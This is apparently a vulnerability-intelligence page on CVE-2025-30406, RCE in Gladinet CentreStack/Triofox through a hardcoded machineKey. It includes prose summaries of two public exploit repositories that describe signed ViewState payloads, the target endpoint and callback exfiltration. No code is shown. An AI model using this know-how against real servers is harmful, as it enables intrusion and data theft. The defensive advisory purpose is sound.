Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization RCE
CVE-2025-30406 is a critical deserialization vulnerability affecting Gladinet CentreStack through 16.1.10296.56315 and related Triofox versions prior to the vendor fixes released in April 2025. The issue is rooted in the CentreStack/Triofox portal’s use of a hardcoded ASP.NET machineKey in IIS web.config/portal configuration. Because the machineKey is used to protect ASP.NET ViewState integrity and confidentiality, an attacker who knows or obtains that key can generate a malicious ViewState payload that the server will accept as valid. When the application processes the crafted ViewState, unsafe server-side deserialization occurs, enabling arbitrary command execution. Reporting indicates the flaw was exploited in the wild beginning in March 2025, and Gladinet fixed it by updating/removing the hardcoded machineKey values in affected configuration files. Some reporting also notes that administrators may need to manually delete or rotate the machineKey in portal\web.config to fully remediate legacy deployments.
Are you exposed to this one?
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
Impact, mitigation & remediation
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
Impact
What an attacker gets, and what they’ve been doing with it.
Mitigation
If you can’t patch tonight, do this now.
Remediation
Patch, then assume compromise.
Exploits
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
This repository is a Proof-of-Concept (PoC) exploit for CVE-2025-30406, a ViewState deserialization vulnerability in ASP.NET applications. The exploit consists of two main Python scripts: 1. 'exploit.py' is the primary exploit script. It uses ysoserial to generate a malicious ViewState payload with a hardcoded validation key and generator. The payload executes an arbitrary command on the target server. If a callback URL is provided, the command is wrapped in PowerShell to send its output to an attacker-controlled HTTP server via HTTP GET. The script sends the payload to a user-specified vulnerable ASP.NET endpoint via POST, embedding it in the '__VIEWSTATE' parameter. 2. 'server.py' is a simple HTTP server that listens (by default on port 8000) for GET requests containing exfiltrated command output. It displays the output in a styled format with timestamps and colored prompts for readability. The repository also includes a detailed README.md with setup, usage instructions, and ethical warnings. The exploit requires the attacker to know the ViewState validation key and generator for the target application, and to have ysoserial available. The exploit is a POC and not weaponized, as it requires manual setup and hardcoded values. The main attack vector is network-based, targeting vulnerable ASP.NET endpoints over HTTP. Fingerprintable endpoints include the target ASP.NET URL and the attacker's callback server for exfiltration.
This repository provides a working exploit for CVE-2025-30406, a critical remote code execution vulnerability in Gladinet CentreStack and Triofox (tested on version 16.1.10296.56315 for Windows). The exploit is implemented in C# (.NET 4.7.2) and generates a malicious ViewState payload containing a serialized XAML object (rce.txt) that triggers arbitrary command execution on the target server. The main entry point is Program.cs, which handles ViewState generation and signing. The README provides usage instructions, including how to use ysoserial.net to generate payloads and target the vulnerable endpoint (/portal/loginpage.aspx). The exploit requires knowledge of the ViewState validation key, which is provided in the README for demonstration. The payload can be customized to execute arbitrary commands, either by modifying the XAML or by sending a custom 'cmd' HTTP header. The repository also includes references to public advisories and detection templates. No evidence of fake or detection-only code was found; this is a functional exploit for RCE via .NET deserialization.
Affected products & vendors
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
Recent activity
43 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A critical Gladinet CentreStack/Triofox vulnerability involving a hard-coded cryptographic key (MachineKey) enabling remote code execution; actively exploited and added to CISA KEV.
A critical Gladinet CentreStack/TrioFox vulnerability caused by hardcoded machine keys that enables server-side deserialization and remote code execution.
A vulnerability in earlier versions of CentreStack and Triofox where a hardcoded machine key allows remote code execution via ViewState deserialization.
A local file inclusion vulnerability in Gladinet CentreStack and Triofox that allows a local attacker to access system files without authentication.
The version that knows your environment.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.